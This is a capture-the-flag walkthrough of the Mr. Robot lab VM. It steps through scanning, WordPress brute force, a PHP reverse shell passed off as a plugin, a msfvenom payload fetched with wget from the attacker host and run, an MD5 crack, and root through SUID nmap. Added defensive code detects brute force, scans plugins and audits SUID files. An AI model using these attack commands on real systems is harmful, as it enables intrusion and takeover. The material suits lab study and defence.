- Start with an nmap scan of the host to find what services the box is running.
```
root@kali:~# nmap -sV 172.16.27.140 -p 1-65535
Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-31 15:12 EDT
Nmap scan report for 172.16.27.140
Host is up (0.00042s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd
MAC Address: 00:0C:29:92:0C:ED (VMware)
```
- Checking the robots.txt file mentioned in the Nikto scan, I see the following.
- Navigating to https://172.16.27.140/key-1-of-3.txt reveals the first flag.
- Turning my attention to the fsocity.dic file, I see what appears to be a large file of potential usernames or passwords. I put it aside and keep it around for later.
- I start to enumerate the web server some more by running a dirb scan against it to see what hidden treasures I might find. I see several wp-* folders indicating that the website is likely a WordPress back end.
- With WordPress identified as the back end, I run a simple wpscan to see if I can find anything interesting but nothing jumps out as being the potential issue.
```
wpscan --url http://172.16.27.140
```
- I attempt to enumerate the potential admin user so that I can use the previously found fsocity.dic file as a wordlist for a brute force attack. The usual method of http://172.16.27.140/?author=1 unfortunately does not turn up anything fruitful, and the same is true for the enumerate-users function of wpscan. I turn my attention to the password reset function of the wp-admin console login and notice that when I try an invalid username I get the following error.
- This next part is where at least a little knowledge of the show is required. I try the usual suspects of admin, root, superadmin, etc., then I try elliot and receive a different error. The two error messages differ depending on whether the username exists, which is what makes the account enumeration possible.
- I now know I have my username, though I’m not sure if it’s admin or not. I use wpscan’s brute force function, change the name of fsocity.dic (presumably the .dic stands for dictionary) to fsocity.txt just to ensure there wouldn’t be any errors, and then run my brute force attack.
```
wpscan -u http://172.16.27.140 -U elliot -w ~/Downloads/foscity.txt -t 16
[+] [SUCCESS] Login : elliot Password : ER28-0652
Brute Forcing 'elliot' Time: 05:16:35 <> (858149 / 858161) 99.99% ETA: 00:00:00
+----+--------+------+-----------+
| Id | Login  | Name | Password  |
+----+--------+------+-----------+
|    | elliot |      | ER28-0652 |
+----+--------+------+-----------+
[+] Finished: Thu Aug 31 11:53:00 2017
[+] Requests Done: 858203
[+] Memory used: 19.344 MB
[+] Elapsed time: 05:16:36
```
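The brute force above generated roughly 858,000 POSTs to wp-login.php from one address in a little over five hours, which is trivially visible in the web server log. The following is an added detection example, not part of the original post: it parses Apache combined-format log lines, flags any source that POSTs to wp-login.php more than a threshold number of times inside a sliding window, and reports whether a 302 (WordPress's successful-login redirect, as opposed to the 200 it returns when it re-renders the form after a failure) appeared from that source. The log lines are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined-log line; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], TS_FMT)
    e["status"] = int(e["status"])
    return e

def detect_wp_bruteforce(lines, window=timedelta(seconds=60), threshold=20):
    """Map source IP -> (POSTs in its busiest window, login succeeded?) for each
    source that POSTs to wp-login.php more than `threshold` times within `window`.
    A 302 among the responses means one of the attempts actually logged in."""
    events = defaultdict(list)
    for line in lines:
        e = parse(line)
        if e and e["method"] == "POST" and e["path"].startswith("/wp-login.php"):
            events[e["ip"]].append((e["ts"], e["status"]))
    hits = {}
    for ip, evs in events.items():
        evs.sort()
        busiest, start = 0, 0
        for i, (ts, _) in enumerate(evs):  # sliding window over sorted timestamps
            while ts - evs[start][0] > window:
                start += 1
            busiest = max(busiest, i - start + 1)
        if busiest > threshold:
            hits[ip] = (busiest, any(status == 302 for _, status in evs))
    return hits

def sample_log():
    """Constructed log: 30 failed POSTs in 30 s from one host, then a 302, plus one ordinary login."""
    base = datetime(2017, 8, 31, 6, 36, 25, tzinfo=timezone(timedelta(hours=-4)))
    fmt = '{ip} - - [{ts}] "POST /wp-login.php HTTP/1.1" {st} 3587 "-" "WPScan"'
    stamp = lambda s: (base + timedelta(seconds=s)).strftime(TS_FMT)
    lines = [fmt.format(ip="172.16.27.133", ts=stamp(i), st=200) for i in range(30)]
    lines.append(fmt.format(ip="172.16.27.133", ts=stamp(30), st=302))
    lines.append(fmt.format(ip="10.0.0.5", ts=stamp(0), st=200))
    return lines
```

Feed it `open('/var/log/apache2/access.log')` instead of `sample_log()` to run it against a real server; rate limiting or lockout on wp-login.php is the corresponding mitigation.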
- With a password to log into WordPress, I log in to discover that the elliot user is an administrator. I tried a couple of times to get a meterpreter shell working to no avail, so I grabbed a PHP reverse shell from Pentest Monkey. I put comments at the top of the PHP file to masquerade it as a WordPress plugin, zipped the file, uploaded it and activated the plugin.
```
/*
* Plugin Name: Shell
* Plugin URI: https://hacked.com
* Description: this is a hacked shell
* Author: derp
* Version: 1.0
* Author URI: https://google.com
*/
```
I set up a netcat listener on the port, and once the plugin was activated it returned a shell to my listener.
```
root@kali:~/Desktop# nc -nvlp 9998
listening on [any] 9998 ...
connect to [172.16.27.133] from (UNKNOWN) [172.16.27.140] 57500
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 00:44:49 up 1 day,  6:30,  0 users,  load average: 0.24, 0.07, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
```
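The plugin header above is all WordPress checks before accepting an upload, so a few comment lines are enough to turn any PHP file into an "installed plugin". As an added example (not code from the original post or from Pentest Monkey), the scanner below walks a wp-content/plugins tree and reports PHP files that call socket- or process-spawning functions a normal plugin rarely needs, which is how the uploaded shell would stand out in a routine audit. The plugin sources it scans are constructed for the example and the suspect one is deliberately not functional.

```python
import os
import re
import tempfile

# Calls a legitimate plugin rarely needs but a reverse shell cannot do without.
RISKY = re.compile(r'\b(fsockopen|proc_open|popen|shell_exec|passthru|system|exec|eval|base64_decode)\s*\(')
HEADER = re.compile(r'Plugin Name:\s*(.+)')

def scan_plugins(root):
    """Walk a wp-content/plugins tree and report every PHP file that calls one
    of the RISKY functions, together with the plugin name its header claims."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith('.php'):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                src = fh.read()
            calls = sorted(set(RISKY.findall(src)))
            if calls:
                header = HEADER.search(src)
                findings.append({
                    'file': os.path.relpath(path, root),
                    'plugin': header.group(1).strip() if header else None,
                    'calls': calls,
                })
    return findings

# Constructed plugin sources: one ordinary plugin and one whose header is just
# enough for the installer but whose body opens a socket and a process.
BENIGN = "<?php\n/*\n* Plugin Name: Hello\n*/\nadd_action('init', function () { echo 'hi'; });\n"
SUSPECT = ("<?php\n/*\n* Plugin Name: Shell\n* Author: derp\n*/\n"
           "$sock = fsockopen($host, $port);\n"
           "$proc = proc_open($cmd, $descriptors, $pipes);\n")

def demo():
    """Build a throwaway plugin directory, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for plugin, source in (('hello', BENIGN), ('shell', SUSPECT)):
            os.makedirs(os.path.join(root, plugin))
            with open(os.path.join(root, plugin, plugin + '.php'), 'w') as fh:
                fh.write(source)
        return scan_plugins(root)
```

Disabling plugin and theme upload for administrators (`DISALLOW_FILE_MODS` in wp-config.php) removes this path entirely, even after an admin password is recovered.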
- With the reverse shell established I provisioned a new meterpreter shell to upload to the server to make use of the additional functionality it provides.
```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.27.133 LPORT=4444 -f elf > shell.elf
cp shell.elf /var/www/html/

ON VICTIM COMPUTER
cd /tmp
wget http://172.16.27.133/shell.elf
chmod 755 shell.elf
./shell.elf
```
- During earlier enumeration I tried to access the /phpmyadmin folder and was told it was only accessible from localhost. With a meterpreter shell in place I can set up a port forward to reach services that were not accessible from the external machine.
```
meterpreter > portfwd add -l 8181 -p 80 -r 172.16.27.140
[*] Local TCP relay created: :8181 <-> 172.16.27.140:80
```
With the forward in place I can now access the restricted phpMyAdmin page by navigating to http://127.0.0.1:8181/phpmyadmin from the attacking machine.
- Another quick bit of enumeration reveals files in the /home/robot directory, one of which is accessible to us and the other, our second key, is not.
```
meterpreter > ls /home/robot
Listing: /home/robot
====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100400/r--------  33    fil   2015-11-13 02:28:21 -0500  key-2-of-3.txt
100644/rw-r--r--  39    fil   2015-11-13 02:28:21 -0500  password.raw-md5
```
```
meterpreter > cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
```
An online MD5 lookup service (marketed as a "decrypter", although MD5 is a hash rather than encryption, so the site is simply matching the digest against a precomputed table) reveals that the password is simply abcdefghijklmnopqrstuvwxyz.
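The lookup works because the file stores an unsalted MD5 digest: the same password always produces the same 32 hex characters, so one precomputed table answers for every site. As an added example (not code from the original post), the block below verifies the page's own hash the way the lookup service effectively does, then shows the storage that defeats the lookup, PBKDF2-HMAC-SHA256 with a per-password random salt, and a login-time upgrade path from one to the other. The `pbkdf2_sha256$iterations$salt$digest` string layout is this example's own convention.

```python
import hashlib
import hmac
import os

# Value from the password.raw-md5 file on the box.
ROBOT_HASH = "c3fcd3d76192e4007dfb496cca67e13b"

def check_legacy_md5(stored_hex, candidate):
    """Unsalted MD5: deterministic, so a precomputed md5(common string) table
    maps the digest straight back to the password. Kept only for migration."""
    digest = hashlib.md5(candidate.encode()).hexdigest()
    return hmac.compare_digest(digest, stored_hex)

def hash_password(password, iterations=600_000, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt; the salt and iteration
    count are stored alongside the digest so they can be raised later."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(stored, candidate):
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

def upgrade_on_login(stored_md5_hex, candidate, iterations=600_000):
    """Transparent migration: if the legacy MD5 matches at login time, return a
    fresh PBKDF2 record to store in its place; otherwise return None."""
    if not check_legacy_md5(stored_md5_hex, candidate):
        return None
    return hash_password(candidate, iterations=iterations)
```

Because every salt is random, two users with the same password get different records and the lookup table that cracked `robot` in seconds no longer applies.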
- Remembering that the server was listening on TCP 21, I thought I might be able to use these credentials to log into an FTP server. There did not appear to be an FTP client available on the server, and attempting to route the traffic through a port forward resulted in a connection refused. I tried using netcat but was met with no success.
```
nc 127.0.0.1 21
220 (vsFTPd 3.0.2)
USER robot
530 Permission denied.
```
- The next logical step is changing my user via the su command, though I'm met with the following error.
```
su robot
su: must be run from a terminal
```
An easy workaround is to use the following two lines, which spawn a pseudo-terminal through Python's pty module so that su has the terminal it insists on.
```
echo "import pty; pty.spawn('/bin/bash')" > /tmp/tty.py
python /tmp/tty.py
daemon@linux:/opt/bitnami/apps/phpmyadmin/htdocs$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:/opt/bitnami/apps/phpmyadmin/htdocs$
```
Authenticated as the robot user, I can now grab the second flag, located in /home/robot.
- Running as the robot user is great, but we need to get root, so it's time to focus on privilege escalation. I downloaded the Pentest Monkey Unix-Privesc-Check onto the box using wget and received a litany of information.
Scrolling through the warnings I see a variety of pieces of information I look into further, but the fruitful line is:
```
WARNING: /usr/local/bin/nmap is SUID root. /usr/local/bin/nmap contains the string /proc/net/route. The user robot can write to /proc/net
Checking if anyone except root can change /usr/local/share/nmap
```
In essence it means that nmap executes with root's privileges no matter which user launches it. Abusing the (now deprecated) --interactive mode of this old nmap 3.81 build, we can obtain a root shell simply by launching nmap in interactive mode and then invoking the shell command.
```
# nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
```
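The root shell comes from one thing: a hand-installed binary under /usr/local with the SUID bit set, which no package manager put there and no baseline expects. As an added example (not code from the original post or from Unix-Privesc-Check), the audit below takes the output of a `find / -perm -4000 -type f -printf '%m %u %p\n'` run, compares it with an expected SUID inventory, and reports every root-owned SUID file that is either absent from the baseline or living outside package-managed directories. The listing and the baseline set are constructed for the example and should be replaced with a real inventory taken from a clean build.

```python
# Constructed output of: find / -perm -4000 -type f -printf '%m %u %p\n'
SAMPLE_LISTING = """\
4755 root /bin/su
4755 root /bin/ping
4755 root /usr/bin/passwd
4755 root /usr/bin/sudo
4755 root /usr/local/bin/nmap
4755 root /opt/example/bin/helper
4755 games /usr/games/scoreboard
"""

# Expected SUID-root files on this build; take it from a clean reference host.
BASELINE = {
    "/bin/su", "/bin/ping", "/bin/mount", "/bin/umount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
}
PACKAGE_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/lib/", "/usr/lib/")

def audit_suid(listing, baseline=BASELINE):
    """Return {path: [reasons]} for every SUID-root file worth a second look.
    Non-root owners are skipped: they cannot hand out uid 0."""
    findings = {}
    for line in listing.splitlines():
        if not line.strip():
            continue
        mode, owner, path = line.split(None, 2)
        if owner != "root" or not mode.startswith("4"):
            continue
        reasons = []
        if path not in baseline:
            reasons.append("not in baseline")
        if not path.startswith(PACKAGE_DIRS):
            reasons.append("outside package-managed directories")
        if reasons:
            findings[path] = reasons
    return findings

def remediation(findings):
    """Commands an administrator would review before running: drop the SUID
    bit on each unexpected file (chmod u-s), then re-audit."""
    return [f"chmod u-s {path}" for path in sorted(findings)]
```

Run the `find` command on the host as root and pipe its output into `audit_suid`; anything it reports, like /usr/local/bin/nmap here, either belongs in the baseline with a documented reason or loses its SUID bit.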
- Being a part of the root group (and running with euid 0) now gives me access to the /root directory. With my privileged access all that's left to do is claim the third key and call it a day.
```
# cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
```
All in all this was a very fun box that employed a good variety of techniques to compromise. Thanks for reading!